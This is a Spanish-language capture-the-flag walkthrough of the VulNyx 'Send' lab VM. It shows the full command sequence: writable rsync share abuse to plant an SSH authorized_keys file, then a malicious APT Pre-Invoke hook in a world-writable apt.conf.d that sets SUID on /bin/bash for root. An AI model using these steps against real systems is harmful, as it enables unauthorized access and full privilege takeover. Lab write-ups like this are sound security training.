VulNyx - Send
Information
Send es una máquina virtual vulnerable Linux de dificultad fácil de la plataforma VulNyx, fue creada por el usuario d4t4s3c y funciona correctamente en los hipervisores VirtualBox y VMware.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.157
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-18 12:23 CEST
Nmap scan report for 192.168.1.157
Host is up (0.000087s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
873/tcp open rsync
❯ nmap -sVC -p22,80,873 192.168.1.157
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-18 12:24 CEST
Nmap scan report for 192.168.1.157
Host is up (0.00042s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http Apache httpd 2.4.59 ((Debian))
|_http-server-header: Apache/2.4.59 (Debian)
|_http-title: Site doesn't have a title (text/html).
873/tcp open rsync (protocol version 31)
Shell (wally)
80/TCP (HTTP)
Site
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.157/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.157/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 278]
Progress: 220545 / 220546 (100.00%)
===============================================================
Finished
===============================================================
873/TCP (RSYNC)
Modules
List
Encuentro un recurso llamado share y en la descripción dice que es el home del usuario wally
❯ rsync 192.168.1.157::
share wally (home)
Access
Dentro de share confirmo que es el home del usuario wally por la estructura de directorios
❯ rsync 192.168.1.157::share
drwx------ 4.096 2024/07/11 17:34:21 .
lrwxrwxrwx 9 2023/04/23 09:34:26 .bash_history
-rw------- 220 2023/01/15 13:58:06 .bash_logout
-rw------- 3.526 2023/01/15 13:58:06 .bashrc
-rw------- 807 2023/01/15 13:58:06 .profile
-r-------- 33 2024/07/11 17:34:21 user.txt
drwxr-xr-x 4.096 2023/04/29 15:50:29 .local
Keys
Create Keys
Con ssh-keygen creo un par de claves SSH
❯ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase for "/root/.ssh/id_rsa" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:HB4FnU2OAHIjYoV1sY9EomD+dx20DOwrVIIgztBJyYs root@kali
The key's randomart image is:
+---[RSA 3072]----+
|+*=*B O+o+.+. |
|Bo*+ O =+o+o. |
| =.. * o+. . |
|E o o *.o. |
| .....S. |
| .... |
| . |
| |
| |
+----[SHA256]-----+
Upload Key
Subo una clave pública autorizada (authorized_keys) a la carpeta .ssh para intentar ganar acceso
❯ mv id_rsa.pub authorized_keys
❯ rsync authorized_keys 192.168.1.157::share/.ssh/
Confirmo que la clave pública (authorized_keys) se ha subido con éxito y accedo al sistema como usuario wally
❯ rsync -r 192.168.1.157::share
drwx------ 4.096 2025/07/18 12:36:55 .
lrwxrwxrwx 9 2023/04/23 09:34:26 .bash_history
-rw------- 220 2023/01/15 13:58:06 .bash_logout
-rw------- 3.526 2023/01/15 13:58:06 .bashrc
-rw------- 807 2023/01/15 13:58:06 .profile
-r-------- 33 2024/07/11 17:34:21 user.txt
drwxr-xr-x 4.096 2023/04/29 15:50:29 .local
drwx------ 4.096 2023/04/29 15:50:29 .local/share
drwx------ 4.096 2023/04/29 15:50:29 .local/share/nano
drwxr-xr-x 4.096 2025/07/18 12:37:17 .ssh
-rw-r--r-- 563 2025/07/18 12:37:17 .ssh/authorized_keys
❯ chmod 600 id_rsa
❯ ssh -i id_rsa wally@192.168.1.157
wally@send:~$ id ; hostname
uid=1000(wally) gid=1000(wally) grupos=1000(wally)
send
Privilege Escalation
Enumeration
Cron
Detecto con pspy que cada un minuto el usuario root (UID=0), realiza una actualización del sistema con apt-get update
2025/07/18 12:46:01 CMD: UID=0 PID=9376 | /usr/sbin/CRON -f
2025/07/18 12:46:01 CMD: UID=0 PID=9377 | /bin/sh -c /usr/bin/apt-get update
2025/07/18 12:46:01 CMD: UID=0 PID=9378 | /usr/bin/apt-get update
APT
Dispone de permisos para escribir en el directorio /etc/apt/apt.conf.d/
wally@send:~$ ls -la /etc/apt/
total 40
drwxr-xr-x 8 root root 4096 ene 15 2023 .
drwxr-xr-x 72 root root 4096 jul 18 12:23 ..
drwxrwxrwx 2 root root 4096 jul 11 2024 apt.conf.d
drwxr-xr-x 2 root root 4096 jun 10 2021 auth.conf.d
-rw-r--r-- 1 root root 150 ene 15 2023 listchanges.conf
drwxr-xr-x 2 root root 4096 mar 28 2021 listchanges.conf.d
drwxr-xr-x 2 root root 4096 jun 10 2021 preferences.d
-rw-r--r-- 1 root root 1011 ene 15 2023 sources.list
-rw-r--r-- 1 root root 0 ene 15 2023 sources.list~
drwxr-xr-x 2 root root 4096 jun 10 2021 sources.list.d
drwxr-xr-x 2 root root 4096 jul 11 2024 trusted.gpg.d
Abuse
Creo un apt malicioso para que al iniciar la tarea y actualizar el sistema ejecute el comando definido en ella
(Utilizo GTFOBins para obtener la secuencia de shell-escape)
wally@send:~$ cd /etc/apt/apt.conf.d/
wally@send:/etc/apt/apt.conf.d$ echo 'apt::Update::Pre-Invoke {"chmod 4755 /bin/bash"};' > suid
Al ejecutar la tarea veo que /bin/bash ya dispone de permisos 4755 (SUID) y me convierto en usuario root
wally@send:~$ /bin/bash -pi
bash-5.1# id ; hostname
uid=1000(wally) gid=1000(wally) euid=0(root) grupos=1000(wally)
send
Flags
Ya como usuario root puedo leer las flags user.txt y root.txt
bash-5.1# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
78fc****************************
9e1d****************************
Hasta aquí la resolución de la máquina Send.
Happy Hacking!